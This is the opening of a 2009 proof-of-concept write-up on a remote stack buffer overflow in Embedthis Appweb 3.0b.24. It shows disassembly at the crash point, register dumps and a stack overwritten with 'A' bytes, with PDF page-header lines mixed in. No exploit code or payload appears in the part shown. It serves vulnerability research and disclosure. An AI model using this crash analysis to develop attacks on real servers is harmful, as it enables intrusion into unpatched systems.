1 /***************************************************************************************
2 Embedthis Appweb Remote Stack Buffer Overflow Poc
3 Embedthis Appweb Debugging Info
4 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
5
6 ASM INSTRUCTIONS
7 −−−−−−−−−−−−−−−−
8 100076CD 8B0A MOV ECX,DWORD PTR DS:[EDX]
9 100076CF 8B50 10 MOV EDX,DWORD PTR DS:[EAX+10]
10 100076D2 51 PUSH ECX
11 100076D3 52 PUSH EDX
12 100076D4 68 14040110 PUSH libappwe.10010414 ; ASCII "%s %s %s"
13 100076D9 55 PUSH EBP
14 100076DA E8 29630000 CALL <JMP.&libmpr.mprPutFmtToBuf>
15
16 DS:[00000000]=???
17 ECX=00000000
18
19 CPU Registers
20 −−−−−−−−−−−−−−
21 EAX 01550080
22 ECX 00000000
23 EDX 00000000
24 EBX 00000072
25 ESP 0012FD08
26 EBP 01550598
27 ESI 00837567 ASCII "" %>s %b"
28 EDI 01320080
29 EIP 100076CD libappwe.100076CD
30 C 1 ES 0023 32bit 0(FFFFFFFF)
31 P 0 CS 001B 32bit 0(FFFFFFFF)
32 A 1 SS 0023 32bit 0(FFFFFFFF)
33 Z 0 DS 0023 32bit 0(FFFFFFFF)
34 S 1 FS 003B 32bit 7FFDF000(FFF)
35 T 0 GS 0000 NULL
36 D 0
37 O 0 LastErr ERROR_MOD_NOT_FOUND (0000007E)
38 EFL 00000293 (NO,B,NE,BE,S,PO,L,LE)
39 ST0 empty −??? FFFF 00000000 144C1A7A
40 ST1 empty −??? FFFF 00000000 109C62C7
41 ST2 empty −??? FFFF 0F3C475C 45A4876F
42 ST3 empty −??? FFFF 109C62C7 41264D5E
43 ST4 empty −??? FFFF 09AC2DB5 50CE16BD
44 ST5 empty −??? FFFF 00000000 17D51378
45 ST6 empty 0.0
46 ST7 empty 0.0
47 3 2 1 0 E S P U O Z D I
48 FST 0007 Cond 0 0 0 0 Err 0 0 0 0 0 1 1 1 (GT)
49 FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
50
51 Stack
52 −−−−−−
Page 1/7
Embedthis Appweb 3.0b.24 Remote Buffer Overflow PoC
fl0 fl0w
08/11/2009
53 <−−−−−−−−−−−−−−−Corruption starts here
54 0012FBB8 41414141 AAAA
55 0012FBBC 41414141 AAAA
56 0012FBC0 41414141 AAA